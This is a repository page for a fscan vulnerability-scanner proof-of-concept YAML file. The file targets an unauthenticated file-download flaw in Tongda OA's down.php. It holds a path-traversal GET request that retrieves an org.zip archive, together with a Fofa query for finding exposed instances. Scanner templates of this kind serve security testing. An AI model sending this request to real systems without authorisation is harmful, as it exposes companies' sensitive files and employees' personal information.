Files
fscan/webscan/pocs/tongda-down-php-unauthorized-access.yaml
T
ZacharyZcR 3ef7a1beee
测试构建 / 代码检查 (push) Has been cancelled
测试构建 / 单元测试和构建 (push) Has been cancelled
测试构建 / 构建验证 (push) Has been cancelled
feat: expand internal network poc coverage
2026-07-16 02:04:36 +08:00

24 lines
736 B
YAML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
id: tongda-down-php-unauthorized-access
info:
name: 通达OA down.php存在未授权访问漏洞
author: Y3y1ng
severity: high
verified: true
description: |-
通达OAOffice Anywhere网络智能办公系统) inc/package/down.php 接口存在未授权访问漏洞,通过此漏洞攻击者构造特殊链接,下载敏感文件,获取企业员工个人信息。
Fofa: app="TDXK-通达OA"
reference:
- https://mp.weixin.qq.com/s/YiPk8YRzgLEdwVWA-F-4XA
tags: tongda
created: 2023/12/04
rules:
r0:
request:
method: GET
path: /inc/package/down.php?id=../../../cache/org
expression: |
response.status == 200 &&
response.raw_header.bcontains(b'org.zip')
expression: r0()